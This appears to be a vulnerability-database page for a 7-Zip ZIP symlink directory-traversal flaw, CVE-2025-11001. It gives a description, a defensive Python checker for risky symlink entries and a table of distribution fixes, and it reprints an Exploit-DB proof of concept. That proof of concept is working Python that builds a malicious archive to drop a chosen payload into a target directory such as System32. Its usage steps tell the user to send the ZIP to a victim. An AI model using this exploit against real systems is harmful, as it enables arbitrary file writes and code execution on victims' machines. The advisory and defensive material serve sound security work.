CVE-2025-11001
Description
7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories. An attacker can leverage this vulnerability to execute code in the context of a service account. Was ZDI-CAN-26753.
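The condition described above, a symbolic-link entry in a ZIP whose target leaves the extraction directory, can be checked before an archive is handed to an extractor. This is an added example, not code from 7-Zip, ZDI or any source on this page; `risky_symlinks` and `build_sample` are hypothetical names, the sample archive is constructed in memory, and the check assumes the Info-ZIP convention that a symlink entry's data holds the link target.

```python
import io
import posixpath
import stat
import zipfile

MAX_TARGET = 4096  # link targets are short paths; never read more than this


def risky_symlinks(zip_bytes):
    """Return [(entry_name, link_target, reason)] for symlink entries whose
    target is absolute, unreadable, oversized or outside the extraction root."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            # Upper 16 bits of external_attr carry the Unix st_mode.
            if not stat.S_ISLNK(info.external_attr >> 16):
                continue
            try:
                with zf.open(info) as fh:
                    raw = fh.read(MAX_TARGET + 1)
            except (zipfile.BadZipFile, RuntimeError):
                findings.append((info.filename, None, "unreadable link target"))
                continue
            # Assumption: entry data is the link target (Info-ZIP convention).
            target = raw.decode("utf-8", "replace").replace("\\", "/")
            if len(raw) > MAX_TARGET:
                findings.append((info.filename, None, "oversized link target"))
            elif target.startswith("/") or target[1:2] == ":":
                findings.append((info.filename, target, "absolute target"))
            else:
                base = posixpath.dirname(info.filename)
                resolved = posixpath.normpath(posixpath.join(base, target))
                if resolved == ".." or resolved.startswith("../"):
                    findings.append((info.filename, target, "escapes extraction root"))
    return findings


def build_sample(links=(("docs/latest", "readme.txt"), ("docs/out", "../../outside"))):
    """Constructed test archive: one regular file plus the given symlink entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "hello")
        for name, target in links:
            entry = zipfile.ZipInfo(name)
            entry.create_system = 3  # Unix, so the mode bits are meaningful
            entry.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(entry, target)
    return buf.getvalue()
```

Archives that produce findings can be quarantined at a mail or upload gateway instead of being passed to an extractor.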
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
7-Zip 24.00 - Directory Traversal
```python
# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.7-zip.org
# Software Link: https://www.7-zip.org/download.html
# Version: 7-Zip < 25.00
# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
# CVE: CVE-2025-11001
# CVSS: 8.8 (High) - draft estimation
# Category: Local Privilege Escalation / Remote Code Execution
# Platform: Windows
# CRITICAL: Yes - Public exploit available, active exploitation reported
# Including: Directory Traversal via crafted symlink entry in ZIP archive
# Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
# Fix: Upgrade to 7-Zip 25.00 or later
# Advisory: https://www.7-zip.org/history.txt
# Patch: https://github.com/ip7z/7zip/releases/tag/25.00
# Target: Windows systems running vulnerable 7-Zip versions
import struct
import os
import argparse
import sys

def build_zip(target_path, payload_file, output_zip):
    if not os.path.isfile(payload_file):
        print(f"[-] Payload file not found: {payload_file}")
        sys.exit(1)
    payload_name = os.path.basename(payload_file)
    payload_data = open(payload_file, "rb").read()
    target = target_path.replace("\\", "/").strip("/") + "/"
    traversal = "../../../../" + target
    with open(output_zip, "wb") as f:
        offset = 0
        symlink_name = "evil.lnk"
        symlink_target = traversal.encode() + b"\x00"
        symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target
        symlink_header = struct.pack("<IHHHHHHIIIHH",
            0x04034b50, 20, 0x800, 0x800, 0, 0, 0,
            0, 0, 0,
            len(symlink_name), len(symlink_extra))
        f.write(symlink_header)
        f.write(symlink_name.encode())
        f.write(symlink_extra)
        f.write(b"")
        symlink_central_offset = offset
        offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)
        payload_header = struct.pack("<IHHHHHHIIIHH",
            0x04034b50, 20, 0x800, 0, 0, 0,
            0, len(payload_data), len(payload_data),
            len(payload_name), 0)
        f.write(payload_header)
        f.write(payload_name.encode())
        f.write(payload_data)
        payload_central_offset = offset
        offset += len(payload_header) + len(payload_name) + len(payload_data)
        cd_offset = offset
        f.write(struct.pack("<IHHHHHHIIIHHHHHII",
            0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
            0, 0, 0,
            len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
        f.write(symlink_name.encode())
        f.write(symlink_extra)
        f.write(struct.pack("<IHHHHHHIIIHHHHHII",
            0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
            0, len(payload_data), len(payload_data),
            len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset))
        f.write(payload_name.encode())
        f.write(struct.pack("<IHHHHIIH",
            0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))
    print(f"[+] Malicious archive created: {output_zip}")
    print(f"[+] Target path : {target_path}")
    print(f"[+] Payload file : {payload_name} ({len(payload_data)} bytes)")
    print(f"[+] Final write location : {target_path}\\{payload_name}")
    print("\n[*] Usage:")
    print(" 1. Send the ZIP file to the victim")
    print(" 2. Victim must run 7-Zip < 25.00 as Administrator")
    print(" 3. Victim opens and extracts the ZIP → payload dropped silently")
    print(" 4. Achievement unlocked")

if __name__ == "__main__":
    banner = """
CVE-2025-11001 - 7-Zip Directory Traversal PoC
Author: Mohammed Idrees Banyamer (@banyamer_security)
"""
    print(banner)
    parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
    parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)")
    parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
    parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")
    args = parser.parse_args()
    build_zip(args.target, args.payload, args.output)
```
OS impact
SUSE Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| — | Affected | — |
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 25.01+dfsg-1~deb13u1 |
| sid | Fixed | 25.00+dfsg-1 |
| forky | Fixed | 25.00+dfsg-1 |
| bullseye | Fixed | 16.02+really25.01+dfsg-0+deb11u1 |
| bookworm | Fixed | 22.01+really25.01+dfsg-0+deb12u1 |